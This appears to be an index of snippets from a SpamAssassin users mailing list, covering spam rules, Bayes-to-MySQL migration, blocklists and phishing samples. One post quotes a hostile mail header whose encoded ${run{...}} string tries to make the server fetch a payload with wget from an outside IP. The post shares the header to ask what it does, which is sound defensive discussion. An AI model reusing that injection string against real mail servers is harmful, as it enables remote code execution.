Re: Strange findings debugging bayes results

Hi, Here's also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch of

Intuit servers sending paypal phishes

Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160]) X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file] and

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

You should probably check that none of your ham (i.e. non-spam) messages contains SPAM_99 or SPAM_999. It can happen when spammers poison your bayes database, and increased score in that case might lead to legitimate mail being misclassified as a spam. That's a great call, thanks. I grepped

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

For that matter how many know about 'apropos'? And, even if they do, they may not discover 'locate' because 'apropos search' doesn't find either 'updatedb' or 'locate'. You have to enter 'apropos find' to discover that 'locate' exists, and even then you could get side tracked into trying to

Re: More fake order spam

Invalid List-ID. You can then use that with other weirdness in a meta. header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/ meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS score  LIST_ID_IMPROPER_FORMAT 0.001 describe

Re: More fake order spam

Hi, Investigate adding the SEM_FRESH rules - this domain was created less than five days ago. https://spameatingmonkey.com/services OK, how do I get those rules installed? I've only installed KAM rules using a channel. I don't see anything similar for SEM rules. I see the page you linked to

Re: More fake order spam

-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE [185.41.28.7 listed in hostkarma.junkemailfilter.com] We've reduced this score to -1 locally. -1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1% Needs to be trained, obviously.

Re: Spoofed amazon order email

Hi Steve, As Antony just reported, post these spamples to something like pastebin.com then provide a link so we can view the raw email. X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on This is the first issue I see - you're likely missing a lot of additional features of later

Re: ANN: ReturnPath rule renaming

Hi,   RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED   RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE   RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL Please audit your local config for score overrides and meta rules depending on the old names. I don't see that the VALIDITY rules exist yet. Will

Re: apache.org is blacklisted

On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote: On Wed, 27 Jan 2021, Benny Pedersen wrote: http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html i dont know how to handle this :=) On 26.01.21 17:43, John Hardin wrote: Only one lists it:  

Re: Emotet today..

Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent in an

Re: Scoring Based on IP Address

Hi, On 12/17/20 6:05 PM, Matt wrote: Is there a way with spamassassin local.conf to add a higher score based on source ip address or subnet? Basically the last IP in "Received:" header. bad_subnet_add_20_points: 192.168.240.0/24 Raising the score if that IP appeared anywhere in headers or

Re: adding AV scanning to working Postfix/SA system

On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote: On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would

Re: adding AV scanning to working Postfix/SA system

On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would also be interested in newer/supported AV

Re: to: header is not in my domain

Thanks for quick reply, but blacklist what? The problem is I do not know this spammy domains. I want to give a score when To: field is NOT in anyaddr...@mydomain.com If only it were that easy. You'll notice that recipients of this mailing list receive mail to the mailing list address, not to

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

On 7/10/20 8:07 AM, Pedro David Marco wrote: >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb wrote: >so glad to read this... confirms my picture of you. >now back my pet project: rewrite Tom Sawyer OK... who starts??? :-) once Finished we can rewrite "El Quixote" as well...

Coronavirus domains

Hi all, Malwarepatrol has just released a list of 13,000+ domains related to coronavirus scams: https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip Anyone else have any rules or changes

SpamAssassin 18th anniversary article

Hi all, LinuxSecurity just posted an article on the history of SpamAssassin and its recent 18th anniversary, some of the new features coming in v4, and speaks with some of the lead developers.

Shell commands in Received and Delivered-To headers

Hi all, Anyone have a guess on what this is trying to accomplish? From r...@sab.com Thu Jul 11 11:05:10 2019 Return-Path: X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com Delivered-To: usern...@example.com Received: by

Re: mysql 8 database problem

On 12/8/18 1:58 PM, Csaba Banhalmi wrote: Hi, I upgraded to mysql and since then I can’t use bases db to score my mails. Spam assassin -D says the following: [12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations for operation ' IN ' [12254] dbg: bayes: cannot use bayes on

Re: stackexchange.com in URIBL (false positive?)

  5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist [URIs: stackexchange.com] I guess that's not supposed to be like that. I can't change anything at it, just for information for somebody in the position to fix that. It is indeed

Re: Just to lighten your day?

Hi, On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote: One slipped through, with this subtle sig line (thought it might brighten someones day . . . ) "Note: Failure to Verify will lead to final termination of your email account. Technical Team Email Administrator All Right Reversed 2018.(c)"

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

Hi, Excellent... except for one potential problem... this is in their "foxhole_all.cdb" file which they label as "high false positive risk" - which could scare some away! For those who don't score very high on ClamAv and/or who are able to score DIFFERENTLY based on different types of

***UNCHECKED*** Can't locate object method "trim_domain"

Hi, while learning an mbox on a recent 3.4.2 svn: # sa-learn --spam --progress --mbox junk-012618 28% [== ] 5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at

Re: SA-Update not updating DB

On 11/17/2017 11:39 AM, Jari Fredriksson wrote: David Jones kirjoitti 16.11.2017 kello 15.22: REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install

Re: SA-Update not updating DB

REV=1815298 wget http://sa-update.ena.com/${REV}.tar.gz wget http://sa-update.ena.com/${REV}.tar.gz.sha1 wget http://sa-update.ena.com/${REV}.tar.gz.asc sa-update -v --install ${REV}.tar.gz (reload/restart whatever is calling SA -- spamd, amavis-new, mimedefang, MailScanner, etc.) I have

Re: Problem with massive log files

Hi, I've posted the spamfilter.sh file to http://pasted.co/7b794ccd I don't see anything in there about verbose logging, but there are two lines in there with a resemblance to your suggestion: logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to SpamAssassin:

Re: Problem with massive log files

og file is up to 165 Gb. You should look at your logging and/or log rotating system to get this under control. I believe that's going to be /etc/logrotate.d/ Regards, Dave Kind regards. Jim. On 04/04/17 22:41, Dave Wreski wrote: Hi, My set up consists of Pos

Re: Problem with massive log files

Hi, My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV, Amavis-new and Dovecot. What is "spamfilter"? Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5 What operating system? Regards,

Re: Define new variables in local.cf

Hi, having the regex into a variable would help maintenance. Something like: $BankList = "Bank1|Bank2|Bank3|Bank4" uri BANKURI /$BankList/i score BANKURI0.2 body BANKBODY /$BankList/i score BANKBODY0.1 is there any way to do this? You might try something like

Re: ClamAV.pm Plugin Not Working

clamdscan -c /etc/clamd.d/scan.conf eicar.txt /home/dan/eicar.txt: lstat() failed: Permission denied. ERROR It looks to be related to clamdscan performing a chroot() and the files you're referencing not being available from within that chroot. Try passing the --stream option. -bash-4.3$

Re: SPF and blocking phishing attempts

Hi, On 10/14/2015 06:08 PM, Dianne Skoll wrote: On Wed, 14 Oct 2015 17:51:23 -0400 Alex wrote: I'd like to make sure incoming mail that appears to be "From:" one of our internal users has indeed gone through one of the systems specified in the SPF record, resulting in

Re: Rules needed...

Hi, blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local RBL). I was hoping for something preventative. Eh? I'm afraid I don't get this at all - greylisting and RBL

Re: Rules needed...

On 06/26/2015 12:45 PM, Benny Pedersen wrote: Alex Regan skrev den 2015-06-26 18:33: http://pastebin.com/FzUkEvRp blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local

Re: PerMsgStatus Util warnings

Hi, $self-{main}-{registryboundaries}-uri_to_domain($fubar); This appears to fix DecodeShortURLs.pm --- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400 +++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400 @@ -486,7 +486,8 @@

Re: Spamassassin not catching spam (Follow-up)

Hi, RH i don't know the UK laws but in germany it's for sure not allowed RH because it's legally classified identical to a postman says meh i don't RH walk to go upstairs today and throw the letter away RH if you pretend to provide relieable mailservices it should be logically RH that discard

Re: URLs with non-ASCII chars

On 02/13/2015 05:29 PM, Dave Pooser wrote: On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote: I thought I would send this on to you instead of broadcasting it. You thought wrong :-) Yeah, thanks One too many emails after reading spam for the last twelve hours dave

URLs with non-ASCII chars

Hi John, I thought I would send this on to you instead of broadcasting it. I just received an email with an odd URL. It contained what appears to be a non-ASCII character simulating a period, or at least one that is not part of the standard set. http://pastebin.com/x6TGNpD7 a

Re: spamassassin 3.4.0 spec file for rhel4 rhel5 rhel6 and compatible os's

21 || : /bin/systemctl try-restart spamassassin.service /dev/null 21 || : %endif %changelog * Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20 - Update to production release - Build for fedora-17 * Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19 - Update SVN

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

Hi, I noticed that the site that provided the malware.blocklist.cf has been unavailable since at least the 8th of August. URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa The FQDN no longer resolves to an address. I have tried our local DNS, Level3 4.2.2.2

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

Hi, Finally found that they changed their name a few months ago, and finally they turned off the .com.br site. http://www.malwarepatrol.net/ wget http://www.malwarepatrol.net//cgi/submit?action=list_sa; Aren't these the same rules that are already present in the sanesecurity clamav db?

Re: Lots of Chinese Spam with attachments

Hear is the typical hits I get on a message: X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE, MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS autolearn=no version=3.3.1 ... X-Spam-Status: No, score=4.6 required=5.0

Re: Migrating bayes to mysql fails with parsing errors

Hi, since so many have problems i share my mysql shemas :=) `token` binary(5) NOT NULL, Yes, the binary or varbinary is the key to a solution here. Mucking with utf-8 vs latin-1 is just covering but not solving the most glaring problem here, namely that a token must not be associated with

Re: Migrating bayes to mysql fails with parsing errors

Hi, ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin; It's now working, but is excruciatingly slow. Is this also just covering the problem, or will this be a usable solution when it finally finishes? Just being curious: are you using bayes_store_module

Re: Migrating bayes to mysql fails with parsing errors

Hi, dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number of rows. I have opened three bug entries, the first one is directly in response to this problem report and brings a fix: [Bug 6624] BayesStore/MySQL.pm fails to

Re: Migrating bayes to mysql fails with parsing errors

Hi, dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number of rows. [repeats ...] Which version of MySQL? Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the schema (according to README.bayes) if you are

Re: Migrating bayes to mysql fails with parsing errors

Hi, It looks like that may be my problem too. This is the result with your patch: dbg: bayes: database connection established dbg: bayes: found bayes db version 3 dbg: bayes: Using userid: 2 dbg: bayes: database connection established dbg: bayes: found bayes db version 3 dbg: bayes: using

Re: Migrating bayes to mysql fails with parsing errors

Hi, since so many have problems i share my mysql shemas :=) please note that i expire som data not default done in current spamassassin Your schema did not work for me. I deleted the existing database and recreated it, then created the tables using your schema. When starting to restore, a

Migrating bayes to mysql fails with parsing errors

Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to convert bayes to use mysql. The restore process fails after a few minutes due to too many errors: dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected

Re: Migrating bayes to mysql fails with parsing errors

Hi, This one is the current SQL schema and works http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql - Lawrence On 20/06/2011 7:34 PM, Dave Wreski wrote: Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying

Re: Migrating bayes to mysql fails with parsing errors

Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to convert bayes to use mysql. The restore process fails after a few minutes due to too many errors: dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected

Re: Nearly 200.000 Spams today from coolserver.info and starsweet.info

Hi, since some days my servers are hit by 50.000-80.000 Spams a day and for some minutes they have spamed today 18 accounts out of 98.000 with MORE then 100.000 spams. All spams coming from the same network: xxx.root.static.coolserver.info xxx.root.static.starsweet.info where xxx

Re: MySQL bayes setup question

Marc, You can also find the readme for sql support there, or check out: http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes It's quite easy to setup and get running. I can't seem to find the bayes_mysql.sql file anywhere. Depending on your distribution it could be in